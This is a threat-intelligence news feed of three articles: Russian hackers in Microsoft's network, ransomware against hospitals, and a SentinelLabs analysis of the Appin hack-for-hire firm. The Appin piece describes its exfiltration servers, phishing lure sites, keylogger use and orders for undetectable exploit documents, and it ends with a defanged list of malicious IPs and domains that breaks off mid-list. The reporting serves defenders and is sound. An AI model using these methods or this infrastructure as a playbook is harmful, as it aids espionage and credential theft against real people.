cyberattack - X-Industry - Red Sky Alliance2024-03-19T05:16:40Zhttps://redskyalliance.org/xindustry/feed/tag/cyberattackMicrosoft’s Ongoing Cyber Attackhttps://redskyalliance.org/xindustry/microsoft-s-ongoing-cyber-attack2024-03-14T13:48:40.000Z2024-03-14T13:48:40.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}12400169052,RESIZE_1200x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12400169052,RESIZE_400x{{/staticFileLink}}" width="250" alt="12400169052?profile=RESIZE_400x" /></a>A Microsoft spokesman reported that the Russian government-backed hacking team that broke into its corporate network and spied on senior executives also stole source code and may still be poking around its internal computer systems. In what is being described as an “ongoing attack,” the world’s largest software maker says it has evidence the hacking group “is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access.” This has included access to some of the company’s source code repositories and internal systems. The company did not provide any additional details on the source code access or which internal systems had been breached. “To date we have found no evidence that Microsoft-hosted customer-facing systems have been compromised,” the representative said.</p>
<p>Microsoft said it is apparent that Midnight Blizzard is still attempting to use secrets of different types that were shared between customers and Microsoft in email in additional attacks. “[As] we discover them in our exfiltrated email, we have been and are reaching out to these customers to assist them in taking mitigating measures,” the company said, warning that the hacking group has increased the volume of some aspects of the attack, such as password sprays, by as much as 10-fold in February, compared to the already large volume we saw in January 2024. </p>
<p>See: <a href="https://redskyalliance.org/xindustry/microsoft-warns-of-apt29-espionage-attacks">https://redskyalliance.org/xindustry/microsoft-warns-of-apt29-espionage-attacks</a></p>
<p>“[The hackers] may be using the information it has obtained to accumulate a picture of areas to attack and enhance its ability to do so. This reflects what has become more broadly an unprecedented global threat landscape, especially in terms of sophisticated nation-state attacks,” the company said. The latest twist comes less than a month after the Midnight Blizzard hackers were <a href="https://www.securityweek.com/microsoft-says-russian-gov-hackers-stole-email-data-from-senior-execs/">caught in Microsoft’s corporate network spying on emails</a> and attachments from senior executives and targets in the cybersecurity and legal departments. </p>
<p>The APT, which has also been blamed for the SolarWinds supply chain hack, used a password spray attack to compromise a legacy non-production test tenant account and gain a foothold, and then used the account’s permissions to access a very small percentage of Microsoft corporate email accounts. “[They] exfiltrated some emails and attached documents,” Microsoft said in a <a href="https://www.sec.gov/Archives/edgar/data/789019/000119312524011295/d708866dex991.htm">filing</a> with the Securities and Exchange Commission (SEC).</p>
<p>The company said its security team detected the nation-state attack on its corporate systems on January 12, 2024 and traced the infection back to November 2023. The discovery of Russian hackers in Microsoft’s network comes less than six months after <a href="https://www.securityweek.com/chinese-cyberspies-used-forged-authentication-tokens-to-hack-government-emails/">Chinese cyber spies were caught</a> forging authentication tokens using a stolen Azure AD enterprise signing key to break into M365 email inboxes. </p>
<p>That hack, which <a href="https://www.securityweek.com/microsoft-cloud-hack-exposed-more-than-exchange-outlook-emails/">led to the theft of email data</a> from approximately 25 government organizations in the United States, is currently being investigated by the CISA Cyber Security Review Board (CSRB). Midnight Blizzard/Nobelium (AKA APT29 and Cozy Bear by others) is the same group that was attributed to hacking IT management solutions provider <a href="https://www.securityweek.com/continuous-updates-everything-you-need-know-about-solarwinds-attack/">SolarWinds</a> in a massive supply chain attack in 2020.</p>
<p> </p>
<p> </p>
<p>This article is presented at no charge for educational and informational purposes only.</p>
<p> </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@redskyalliance.com</a> </p>
<p> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p> </p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www. redskyalliance. org/</a></li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www. linkedin. com/company/64265941</a> </li>
</ul>
<p> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p> </p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p> </p>
<p><span style="font-size:8pt;"><a href="https://www.securityweek.com/microsoft-says-russian-gov-hackers-stole-source-code-after-spying-on-executive-emails/">https://www.securityweek.com/microsoft-says-russian-gov-hackers-stole-source-code-after-spying-on-executive-emails/</a></span></p>
<p> </p>
<p> </p>
<p> </p></div>Cyber-Attacks on Hospitalshttps://redskyalliance.org/xindustry/cyber-attacks-on-hospitals2024-02-26T17:00:00.000Z2024-02-26T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12389945471,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12389945471,RESIZE_400x{{/staticFileLink}}" width="250" alt="12389945471?profile=RESIZE_400x" /></a>Cybersecurity experts are warning that hospitals around the country are at risk for attacks like the one that is crippling operations at a premier Midwestern children’s hospital and that the US government is doing too little to prevent such breaches. Hospitals in recent years have shifted their use of online technology to support everything from telehealth to medical devices to patient records. Today, they are a favorite target for internet thieves who hold systems’ data and networks hostage for hefty ransoms, said John Riggi, the American Hospital Association’s cybersecurity adviser. “Unfortunately, the unintended consequence of using all this network- and internet-connected technology is that it expanded our digital attack surface,” Riggi said. “So, many more opportunities for bad guys to penetrate our networks.”<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/hive-hospitals">https://redskyalliance.org/xindustry/hive-hospitals</a></p>
<p>The assailants often operate from American adversaries such as Russia, North Korea, and Iran, where they enjoy big payouts from their victims and face little prospect of ever being punished. In November 2023, a ransomware attack on a healthcare chain that operates 30 hospitals and 200 health facilities in the United States forced doctors to divert patients from emergency rooms and postpone elective surgeries. Meanwhile, a rural Illinois hospital announced it was permanently closed last year because it could not recover financially from a cyberattack. The hackers went as far as posting photos and patient information of breast cancer patients who were receiving treatment at a Pennsylvania health network after the system was hacked last year.</p>
<p>Recently, one of the top children’s hospitals in the country, the Ann & Robert H. Lurie Children’s Hospital of Chicago, has been forced to put its phone, email, and medical record systems offline as it battles a cyberattack. The FBI has said it is investigating. Brett Callow, an analyst for the cybersecurity firm Emsisoft, counted 46 cyberattacks on hospitals last year, compared with 25 in 2022. The paydays for criminals have gotten bigger, too, with the average payout jumping from $5,000 in 2018 to $1.5 million last year. “Unless governments do something more meaningful, more significant than they have done to date, it’ll inevitably get worse,” Callow said.</p>
<p>Callow believes the government should ban cyberattack victims such as hospitals, local governments and schools from paying ransoms. “There’s so much money being paid into the ransomware system now there’s no way the problem is going to go away on itself simply,” he said. The dramatic increase in these online raids has prompted the nation’s top health agency to develop new rules for hospitals to protect themselves from cyber threats.</p>
<p>The Department of Health and Human Services said it will rewrite the rules for the Health Insurance Portability and Accountability Act, the federal law commonly called HIPPA that requires insurers and health systems to protect patient information to include new provisions that address cybersecurity later this year. The department is also considering new cybersecurity requirements attached to hospitals’ Medicaid and Medicare funding.</p>
<p>Most hospitals will struggle to protect themselves. Experts are worried about rural hospitals, for example, that may have difficulty cobbling together money to update their cybersecurity properly. HHS wants more money from Congress to tackle the issue, but Palm said the agency doesn’t have a precise dollar amount it seeks. Becoming the victim of a cyberattack is costly, too. The attacks can put hospitals’ networks offline for weeks or months, forcing hospitals to turn away patients.</p>
<p>In Chicago, Lurie Hospital’s network has been offline for two weeks. The hospital, which served more than 260,000 patients last year, has established a separate call center for patients’ needs and resumed some care. </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p> </p>
<p> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/">https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/</a></p></div>Elephant Huntinghttps://redskyalliance.org/xindustry/elephant-hunting2023-12-01T17:33:55.000Z2023-12-01T17:33:55.000ZCyberDoghttps://redskyalliance.org/members/CyberDog189<div><p><a href="{{#staticFileLink}}12306209278,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12306209278,RESIZE_400x{{/staticFileLink}}" alt="12306209278?profile=RESIZE_400x" width="211" /></a>Our friends at SentinelLabs report that Hack-for-Hire threat actors go by many names, such as surveillance-for-hire, mercenaries, private-sector-offensive-actors (PSOAs), and nonstate offensive threat actors. Such groups represent an exciting challenge for security researchers and network defenders. They should be considered a severe threat to all organizations, worthy of proactive tracking in ongoing intrusions and analysis of historical cases to understand their significant impacts. Many public industry reports have highlighted attempts to track and disrupt mercenary threat actors, including our past <a href="https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/">work on Void Balaur</a> and <a href="https://about.fb.com/wp-content/uploads/2022/12/Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf">Meta’s Surveillance-for-Hire report</a>.</p>
<p>Below, SentinelLabs shares findings from a review of highly unique, non-public, and technically verified data on the hack-for-hire efforts of the Appin business. After an extensive review of this data, brought to our attention by <a href="https://www.reuters.com/investigates/special-report/usa-hackers-appin/">Reuters</a> investigative journalists, we assess with high confidence that it correlates with previously known Appin intrusions, accurately depicts internal communications, and originated from inside the security arm of the Appin organization– formally known as Appin Software Security and informally as Appin Security Group (ASG).<a href="#_ftn1">[1]</a></p>
<p>Introduction to Appin - Appin is considered the original hack-for-hire company in India, offering an offensive security training program alongside covert hacking operations since at least 2009. Their past employees have since spread to form newer competitors and partners, evolving the Appin brand to include new names, while some have spread into cybersecurity defense industry vendors. Appin was so prolific that a surprising amount of current Indian APT activity still links back to the original Appin group of companies in one form or another. Campaigns conducted by Appin have revealed a noteworthy customer base of government organizations and private businesses spread globally.</p>
<p>Our analysis and observations corroborate the <a href="https://www.reuters.com/investigates/special-report/usa-hackers-litigation/">June 2022 reporting from Reuters</a>, noting some of Appin’s customers are tied to significant litigation battles. The group has conducted hacking operations against high-value individuals, governmental organizations, and other businesses involved in specific legal disputes. Appin’s hacking operations and overall organization often appear informal, clumsy, and technically crude; however, their operations proved highly successful for their customers, impacting world affairs significantly.</p>
<p>Victims and Links to Previous Reporting - The extensive scope of unique targets and confirmed victims extends globally. The data reveals victims across the United States, Canada, China, India, Myanmar, Kuwait, Bangladesh, the United Arab Emirates, Pakistan, and other locations. The affected devices encompass those affiliated with both governmental entities and businesses across various industries. It is important to note that the aforementioned list is not exhaustive, serving as a snapshot at a particular moment rather than a comprehensive compilation of all targets and victims.</p>
<p><br /> <a href="{{#staticFileLink}}12306210265,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306210265,RESIZE_584x{{/staticFileLink}}" alt="12306210265?profile=RESIZE_584x" width="512" /></a><em>Victim Beacon Source IPs Visualized</em></p>
<p>From a threat intelligence perspective, the data includes identifying specific victims of notable public interest. Attacks on China and Pakistan from India-linked threat actors are not new; however, the confirmation that a local Indian hack-for-hire group was enlisted to conduct these campaigns is insightful on the attribution of presumably state-sponsored attacks out of India. We can confirm some known victimology as well as observe additional previously undiscovered victims:</p>
<p>Pakistani Government Officials - These victims were successfully compromised and sent keylogger data from their machines to the Appin-owned and controlled server. The keylogger data contained personal social media and email account logins, government website logins, and more mundane web browsing like travel, games, and pornography sites. Pakistani targeting continued in the years following, as <a href="https://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/">reported by ESET in 2013</a> and noted in the below Operation Hangover report.</p>
<p>Chinese Government Officials - Multiple cases in 2009 involved data theft operations against Chinese government officials. These include the successful compromise of multiple PLA officers. Around the same time, operators successfully compromised Military Liaison Officers with the same objective. Notably, these attacks were carried out shortly after <a href="https://web.archive.org/web/20091105083349/https:/timesofindia.indiatimes.com/india/china-mounts-cyber-attacks-on-indian-sites/articleshow/3010288.cms">Indian government officials</a> made public statements they had observed cyber attacks on Indian government networks and attributed the activity to China.</p>
<p>Domestic Targeting - There are also many cases of domestic targeting. For example, in one case, the Intelligence organization within a local police force enlisted Appin to conduct defacement attacks on specific Sikh websites and to steal login credentials of email accounts belonging to Sikhs in India and the US. One such inbound request reviewed contained a formal request document for Appin to break into the personal Gmail account of a specific individual labeled as a domestic terrorist target. In an unrelated campaign, the group also used the domain speedaccelator[.]com for an FTP server, hosting malware used in their malicious phishing emails, one of which was used on <a href="https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/">an Indian individual later targeted by the ModifiedElephant APT</a>.</p>
<p>KitM Mac Spyware - In 2013, F-Secure analyzed and reported (<a href="https://archive.f-secure.com/weblog/archives/00002554.html">1</a>,<a href="https://archive.f-secure.com/weblog/archives/00002558.html">2</a>,<a href="https://archive.f-secure.com/weblog/archives/00002559.html">3</a>) on the technical details of Mac spyware initially discovered on the machine of an Angolan activist while visiting the Oslo Freedom Forum (“a global gathering of activists united in standing up to tyranny.”). This Mac spyware was quite unique at the time, and ultimately dubbed KitM (‘Kumar in the Mac’, referring to the certificate issued under the name ‘Rajinder Kumar’, used to sign all of the samples), and used Appin-owned and operated infrastructure. The newly reviewed data provided some of the context behind this campaign and confirmed actor attribution to Appin.</p>
<p>Operation Hangover - One of the more interesting links to previous reporting is the overlap with <a href="https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/NS-Unveiling-an-Indian-Cyberattack-Infrastructure_FINAL_Web.pdf">Operation Hangover</a>. This 2013 report was a unique deep dive into threat activity around an industrial espionage campaign against the Norwegian telecommunications corporation Telenor and other private companies. The authors note multiple strong links between the Appin organization and the attacks observed in the wild. Our new findings confirm that the malware and attack infrastructure noted in the Operation Hangover report were owned and controlled by Appin, such as taraanasongs[.]com and others highlighted here.</p>
<p>Below is a graphic depicting the process of acquiring Operation Hangover-related domains. In late October 2009, an operator requested a “new domain for phishing and exe upload” from their manager. After approval, The manager forwarded the request, which went to the executive staff and finance manager. A day later, the operator acknowledged the new domain (taraanasongs[.]com), and the manager informed the executive staff of its acquisition.</p>
<p><br /> <a href="{{#staticFileLink}}12306210672,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306210672,RESIZE_584x{{/staticFileLink}}" alt="12306210672?profile=RESIZE_584x" width="534" /></a><em>Appin Operator Requesting Purchase of taraanasongs[.]com</em></p>
<p>Infrastructure Acquisition and Use - Leading hack-for-hire organizations are faced with essential segmentation requirements to limit the discovery of their infrastructure. If a researcher were to discover what connects all points of their infrastructure together, it would risk the entire set of customer operations. Appin’s method of acquiring and managing infrastructure for years was handled through a particular outside contractor. At the time, this individual would register the domains and set up hosting solutions for a project as needed. Appin operators would request a server type, including some technical requirements, and which operator is assigned for its use. The consultant would then purchase the server, set it up as instructed, provide credentials for remote access to the operator and Appin leadership, and conclude the interaction with an invoice detailing payment. Based on the data reviewed, the consultant made the purchases through a collection of repeated personal and business-branded email accounts, in addition to overlapping registration and hosting details.</p>
<p><br /> <a href="{{#staticFileLink}}12306210680,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306210680,RESIZE_584x{{/staticFileLink}}" alt="12306210680?profile=RESIZE_584x" width="449" /></a><em>Invoice to Appin for Malicious FTP Domains and VPS Servers</em></p>
<p>The types of servers requested generally centered around a handful of primary purposes.</p>
<p>Exfiltration – Often referred to as FTP or Data Transfer servers in the early years, malware would use these as the destination for exfiltrating stolen data. One may also find the logs of an Appin-owned and operated exfiltration server useful for victim identification. For example, as previously noted, those originating from devinmartin[.]net highlight a global victim spread. Data was uploaded to this specific FTP server with accounts:</p>
<ul>
<li>stealth@devinmartin[.]net</li>
<li>keylogs@devinmartin[.]net</li>
<li>radar@devinmartin[.]net</li>
<li>123456@devinmartin[.]net</li>
<li>devinmartin@devinmartin[.]net</li>
<li>revolution@devinmartin[.]net</li>
<li>devinmart@devinmartin[.]net</li>
<li>reloaded@devinmartin[.]net</li>
<li>cinema@devinmartin[.]net</li>
<li>lux@devinmartin[.]net</li>
</ul>
<p><em><a href="{{#staticFileLink}}12306212263,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306212263,RESIZE_710x{{/staticFileLink}}" alt="12306212263?profile=RESIZE_710x" width="626" /></a>Data Exfiltration Logs from the C2 server, with Victim IPs Redacted</em></p>
<p>C2 and Delivery Servers – Malware command and control or hosting malware for download.<br /> <br /> <a href="{{#staticFileLink}}12306212293,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306212293,RESIZE_584x{{/staticFileLink}}" alt="12306212293?profile=RESIZE_584x" width="578" /></a><em>C2 / Delivery Server bluecreams[.]com and Linked Malware Visualized</em></p>
<p>Phishing – Hosted web pages for credential phishing. The same phishing pages were often available through multiple target-named subdomains and URLs.</p>
<p>Lure Sites – A fascinating technique was the use of referenced “honeypots.” These sites would often be themed around a specific topic and lure the target to interact for credential phishing or malware delivery. One such example is islam-jindabad.blogspot[.]com, which remains online at the time of this writing. It was created in 2009 and called a “honey pot” by Appin operators. The domain led to a second domain that delivered malware after clicking an image. The destination address of these images is gmail-loginchk.freehostia[.]com/raj1.php<br /> <a href="{{#staticFileLink}}12306212686,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306212686,RESIZE_710x{{/staticFileLink}}" alt="12306212686?profile=RESIZE_710x" width="628" /></a><em>Malicious Lure Site, Directs to Malware Download</em></p>
<p>VPS Server – Generic multi-purpose server for non-attributable access to victim machines and attack infrastructure administration. Typically accessed through SSH. Additionally, a non-standard server type was also used by Appin covert communications. The business used specific websites for customer project tracking and data sharing. This was variously referred to as GoldenEye, Commando, or MyCommando. It acted as a place where customers could log in to view and download campaign-specific data and status updates, communicate securely, and manage other aspects of their projects.</p>
<p><a href="{{#staticFileLink}}12306213071,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306213071,RESIZE_710x{{/staticFileLink}}" alt="12306213071?profile=RESIZE_710x" width="601" /></a>Covert Communications Login</p>
<p>This is the same “Secured Project Management Portal” highlighted in an Appin marketing presentation, <a href="https://www.documentcloud.org/documents/22065658-appin-efiia-pp">first shared by Reuters</a> in their June 2022 mercenary hacker investigative report.</p>
<p><br /> <a href="{{#staticFileLink}}12306213281,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306213281,RESIZE_584x{{/staticFileLink}}" alt="12306213281?profile=RESIZE_584x" width="426" /></a><em>Appin Marketing Document Showing Covert Communications Portal</em></p>
<p>Malware and Exploit Development - Appin used the California-based freelancing platform Elance (now known as Upwork) to purchase malware from external software developers while using internal employees to develop those projects and their own tools. Appin posted elance jobs under the username “appinsecuritygroup” and a profile set with an Appin executive's full name and appinonline[.]com email address. An example of Elance's use is purchasing the USB Propagator tool from the freelancer “alexstinger.” The original job posting was titled “Creation of Advanced Data Backup Utility.” The same tool is also referenced in the Operation Hangover report. The original version was purchased in 2009 for $500 after troubleshooting and source code delivery. The Elance job statement was completed on July 15th, 2009.</p>
<p><br /> <a href="{{#staticFileLink}}12306214096,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306214096,RESIZE_584x{{/staticFileLink}}" alt="12306214096?profile=RESIZE_584x" width="469" /></a><em>Source files delivered by “alexstinger”</em><br /> <a href="{{#staticFileLink}}12306214480,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306214480,RESIZE_710x{{/staticFileLink}}" alt="12306214480?profile=RESIZE_710x" width="616" /></a><em>Snapshot of source code delivered by “alexstinger”</em></p>
<p>Appin advertised on Elance for many other software projects as well, including ones titled:</p>
<ul>
<li>Audio Recording Software on Windows</li>
<li>Creation of a code obfuscator for C, Visual C++</li>
<li>Exploits for research purposes on MS Office and IE</li>
<li>MS Office Exploits to upgrade our IPS/Antivirus!</li>
<li>R&D in vulnerability research in Eastern Europe</li>
</ul>
<p> </p>
<p>A summary of the job post for “R&D in vulnerability research in Eastern Europe” shows the following.</p>
<table width="670">
<tbody>
<tr>
<td width="151">
<p>Description</p>
</td>
<td width="486">
<p>To outsource research in exploits and vulnerabilities on a monthly retainer basis to expert organizations in Eastern Europe</p>
</td>
</tr>
<tr>
<td width="151">
<p>Skills Required</p>
</td>
<td width="486">
<p>Vulnerability and Exploits Gathering, Exploit Development</p>
</td>
</tr>
<tr>
<td width="151">
<p>Focus/Deliverables</p>
</td>
<td width="486">
<p>Developing exploits on existing vulnerabilities or customization of exploit samples on the internet related to MS Office (Word, Excel, PowerPoint 2007/2003, etc), Adobe PDF, Browsers IE 6/7, Mozilla Firefox, and Opera.</p>
</td>
</tr>
<tr>
<td width="151">
<p>Minimum Expectation</p>
</td>
<td width="486">
<p>At least two exploits a month. Exploits should be customizable with payloads, Minimum detection from AV, and Weekly reports on successes/failures.</p>
</td>
</tr>
<tr>
<td width="151">
<p>Payment</p>
</td>
<td width="486">
<p>$1,000 monthly</p>
</td>
</tr>
</tbody>
</table>
<p>A recurring problem with these job postings was that freelancers quickly rejected them after noting the low payment amount and questioning whether they were intended for malicious use. Appin used a large amount of private spyware and exploit services over the years, too. For example, in 2010 they purchased mobile spyware services through Vervata, the business behind the FlexiSPY mobile stalkerware. When this transaction was conducted, the domain mobilebackup[.]biz was used by operators for installing guides, downloading software, and reviewing victim mobile device data. While this is historical data, it remains the case that FlexiSPY stalkerware is still marketed and sold today.</p>
<p><br /> <a href="{{#staticFileLink}}12306214852,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306214852,RESIZE_710x{{/staticFileLink}}" alt="12306214852?profile=RESIZE_710x" width="614" /></a><em>Archived snapshot of Vervata homepage, FlexiSPY product offering at the time</em> <em><br /> <a href="{{#staticFileLink}}12306215296,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306215296,RESIZE_584x{{/staticFileLink}}" alt="12306215296?profile=RESIZE_584x" width="536" /></a>Archived Flexispy Login Portal 2010</em></p>
<p>Appin later pursued the purchase of exploits from leading private vendors at the time, including <a href="https://en.wikipedia.org/wiki/Vupen">Vupen</a> and Core Security. Business interests also involved the opportunity for Appin to act as an exploitative reseller for Vupen to the Indian government.</p>
<p><br /> <a href="{{#staticFileLink}}12306215853,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306215853,RESIZE_400x{{/staticFileLink}}" alt="12306215853?profile=RESIZE_400x" width="291" /></a><em>Vupen and Appin Exploit Subscription Agreement Document</em></p>
<p>As noted, some malware was developed internally, including a keylogger. Associated data and communications reveal an employee's initial intention to share their development of the keylogger to Appin leadership in August 2009. In a reviewed message, the employee noted a new keylogger being built, which can upload logs to the FTP server. Tests were conducted over the following weeks and months to showcase the keylogger’s capabilities. Here is one such file in which the developer tested the keylogger’s functionality, which is being detected by third-party antivirus solutions. The data redacted included the developer’s personal email address.</p>
<p><br /> <a href="{{#staticFileLink}}12306216055,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306216055,RESIZE_400x{{/staticFileLink}}" alt="12306216055?profile=RESIZE_400x" width="390" /></a><em>Keylogger Beaconing, Detected by AV</em></p>
<p>Months later the keylogger was being used in live operations, including in a campaign targeting the Pakistan government. Government victim data included personal email addresses and instant messaging activity, browsing for new jobs in the Pakistan Navy, reading/printing <a href="https://en.wikipedia.org/wiki/Inter-Services_Public_Relations">ISPR</a> news, and other personally sensitive online activity.</p>
<p>The Hack-For-Hire Business - Although hack-for-hire organizations in India and elsewhere have evolved markedly over the years as both the technology available to them and the ecosystem in which they operate have changed, a clear snapshot of Appin’s activity starting from around the early 2000s provides invaluable insight into the inner workings of such businesses. Ignoring Appin’s many business offerings related to network penetration testing, website security auditing, training, and more, we can focus on the part most interesting to cyber defenders and threat intelligence analysts: the hack-for-hire offerings. Below is a proposed offering of Appin’s ‘Special Services Division’ to India’s Chhattisgarh Police Cyber Investigation Cell.</p>
<p><br /> <a href="{{#staticFileLink}}12306215886,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12306215886,RESIZE_584x{{/staticFileLink}}" alt="12306215886?profile=RESIZE_584x" width="568" /></a><em>Appin Special Services Division Offering (original text)</em></p>
<p>While a full review of the business structure is outside the scope of this report, a few relevant cybersecurity observations are useful to list: Offensive security services provided to customers well over a decade ago included data theft across many forms of technology, often internally referred to as “interception” services. These included keylogging, account credential phishing, website defacement, and SEO manipulation/disinformation. They would also accommodate other technical requests from a customer on-demand, such as cracking passwords from stolen documents.</p>
<p>Operations Security (OPSEC) is taken seriously in theory but was inadequately executed in practice. Operators, developers, and leadership were disciplined not to discuss project specifics (targets, customers, tools, etc.) through weak communication channels. However, it appears that leadership repeatedly initiated the failure to abide by those standards. Examples include analysts refusing to write down confidential technical information related to sensitive operations while leadership openly discussed and documented the exact details.</p>
<p>The roles of individual operators are often built uniquely around their skill sets rather than formal responsibilities based on a structured role. This includes operators and developers mixing tasks depending on the individual’s interests and career tenacity. There is a strong, financially incentivized push from leadership to all individual operators and developers for innovative ideas that can better achieve success on behalf of their customers. This includes finding new tools and techniques to accomplish the desires of the customer. Some OPSEC gaps originate from the resulting unchecked innovation.</p>
<p>A Day in the Life - While the operator and developer roles proved fluid over time, we can glimpse the leadership’s priorities based on weekly task lists handed down to the early ‘development’ group. Tasks were assigned to individuals, including the following objectives:</p>
<ul>
<li>Individual A:</li>
</ul>
<p>Build fully functional & undetectable malicious documents using exploits.</p>
<p>Resolve issues of malware not collecting specific messaging software logs.</p>
<p>Coordinate with exploit developers (internal) for other ongoing campaigns.</p>
<ul>
<li>Individual B:</li>
</ul>
<p>Build and finish the new network lateral movement solution.</p>
<p>Rebuild “FTP Backup trojan” to make it fully undetectable.</p>
<ul>
<li>Individual C:</li>
</ul>
<p>Build a new process with exploit developers (internal) for weekly use of new fully-undetectable attack tools.</p>
<p>Troubleshoot phishing website problems, such as specific language characters not recording correctly.</p>
<p><br /> Educate operators on other internal tools - It’s ultimately unsurprising to learn of tasks and the individuals assigned to them; however, it is useful when contextualizing the overlapping technical links and improvements between campaigns, such as version updates of the FTP Backup trojan.</p>
<p>Moving Forward - Our examination of the Indian hack-for-hire group Appin underscores the enduring and substantial threat posed by such entities to businesses, governments, and individuals over an extended period exceeding a decade. The research findings underscore the group’s remarkable tenacity and proven track record of successfully executing attacks on behalf of a diverse clientele. Our study's technical insights and infrastructure offer a valuable resource for mapping associated malicious activities and reevaluating past incidents with a renewed perspective.</p>
<p>The resilience of these groups, coupled with their capacity to attract new clients despite heightened public scrutiny, emphasizes the urgent need for enhanced international cooperation and the establishment of robust legal frameworks to address this escalating challenge effectively. In light of advancing technologies and the growing demand for digital espionage and cybercrime services, it is imperative for governments, businesses, and high-risk individuals to proactively implement measures to protect themselves against these formidable, adaptable, and thriving hack-for-hire threat actors.</p>
<p>Historical Indicators of Compromise - Note some of the following indicators have since been used for legitimate reasons or sinkholed. Therefore, we advise caution if considering these as active indicators in their current state.</p>
<p>IPs<br /> 64.186.132[.]165<br /> 65.75.243[.]251<br /> 65.75.250[.]66<br /> 69.197.147[.]146<br /> 75.127.111[.]165<br /> 75.127.78[.]100<br /> 75.127.91[.]16<br /> 84.243.201[.]254<br /> 212.72.189[.]74</p>
<p>Domains<br /> abdupdates[.]com<br /> alr3ady[.]net<br /> antivirusreviewratings[.]com<br /> authorisedsecurehost[.]com<br /> bksrv3r001[.]com<br /> bluecreams[.]com<br /> bookshopmarket[.]com<br /> brandsons[.]net<br /> braninfall[.]net<br /> c00lh0sting[.]com<br /> c0ttenc0unty[.]com<br /> cr3ator01[.]net<br /> crowcatcher[.]com<br /> crvhostia[.]net<br /> currentnewsstore[.]com<br /> customauthentication[.]com<br /> devinmartin[.]net<br /> directsupp0rt[.]com<br /> divinepower[.]info<br /> draganheart[.]com<br /> easyhost-ing[.]com<br /> easyslidesharing[.]net<br /> f00dlover[.]info<br /> filetrusty[.]net<br /> follow-ship[.]com<br /> forest-fire[.]net<br /> foxypredators[.]com<br /> freensecurehost[.]com<br /> freesecurehostings[.]com<br /> freewebdomainhost[.]com<br /> freewebuserhost[.]com<br /> gauzpie[.]com<br /> gmail-loginchk[.]freehostia[.]com<br /> h3helnsupp0ort[.]com<br /> hatemewhy[.]com<br /> hostingserveronline[.]net<br /> hotmasalanewssite[.]com<br /> islam-jindabad[.]blogspot[.]com<br /> jasminjorden[.]]com<br /> jasminjorden[.]com<br /> karzontheway[.]com<br /> kungfu-panda[.]info<br /> matrixnotloaded[.]com<br /> msfileshare[.]net<br /> msoftweb[.]com<br /> myt3mple[.]com<br /> newamazingfacts[.]com<br /> nitr0rac3[.]com<br /> pc-technsupport[.]com<br /> piegauz[.]net<br /> r3gistration[.]net<br /> reliablensecurehost[.]net<br /> s0pp0rtdesk[.]com<br /> s3rv1c3s[.]net<br /> secuina[.]net<br /> securenhost[.]com<br /> server003[.]com<br /> server006[.]com<br /> serverrr[.]com<br /> serviceaccountloginservicemail[.]info<br /> servicesaccount[.]com<br /> sliderocket[.]com<br /> speedaccelator[.]com<br /> 